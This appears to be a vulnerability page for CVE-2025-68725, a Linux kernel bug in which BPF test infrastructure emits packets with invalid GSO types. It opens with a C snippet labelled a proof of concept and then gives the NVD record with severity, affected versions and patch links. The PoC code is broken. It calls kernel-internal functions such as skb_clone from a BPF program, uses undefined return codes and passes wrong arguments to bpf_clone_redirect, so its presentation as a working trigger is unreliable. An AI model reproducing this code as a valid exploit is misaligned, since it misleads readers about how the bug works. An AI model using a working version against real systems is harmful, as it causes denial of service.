CVE-2025-68725

// CVE-2025-68725 PoC - BPF Test Infrastructure GSO Type Validation Issue // This PoC demonstrates how BPF test infra can emit invalid GSO types #include <linux/bpf.h> #include <linux/skbuff.h> // BPF program that triggers the vulnerability via bpf_clone_redirect SEC("test/gsotype_issue") bpf_test_gsotype_trigger(struct __sk_buff *skb) { struct sk_buff *clone; struct net_device *lo; // Get loopback device lo = dev_get_by_name(&init_net, "lo"); if (!lo) return BPF_DROP; // Clone the skb - this creates a skb with malformed GSO properties clone = skb_clone(skb, GFP_ATOMIC); if (!clone) { dev_put(lo); return BPF_DROP; } // The clone has gso_segs and gso_size set but gso_type is invalid // This triggers skb_warn_bad_offload() when redirected to loopback bpf_clone_redirect(skb->ifindex, 0, 0); dev_put(lo); return BPF_REDIRECT; } /* Vulnerability Trigger Conditions: 1. BPF program uses bpf_clone_redirect() with skb having GSO properties 2. convert___skb_to_skb() sets gso_segs/gso_size but not gso_type 3. Packet redirected to loopback device triggers skb_warn_bad_offload() 4. GSO features are disabled as a defensive measure Mitigation: Reject such packets in bpf_clone_redirect() before emission */

{"cve": {"id": "CVE-2025-68725", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-12-24T11:16:01.797", "lastModified": "2026-02-26T18:43:52.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -> gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "5.10.249", "matchCriteriaId": "130E98F6-F2B7-498A-A2FF-D360B3D340E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.199", "matchCriteriaId": "A247FBA6-BEB9-484F-B892-DD5517949CCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.68", "matchCriteriaId": "52F38E19-0FDD-4992-9D6D-D4169D689598"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.2", "matchCriteriaId": "BD6A474E-1AF3-4675-9A46-086E5D8F61CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/04a899573fb87273a656f178b5f920c505f68875", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0f3a60869ca22024dfb9c6fce412b0c70cb4ea36", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/768376ece7036ecb8604961793a1b72afe6345dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8670b53b8ee91f028f7240531064020b7413c461", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bb7902ed7d7f6d6a7c6c4dc25410d6127ce1085f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e0ffb64a2d72c6705b4a4c9efef600409f7e98a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fbea4c63b5385588cb44ab21f91e55e33c719a54", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}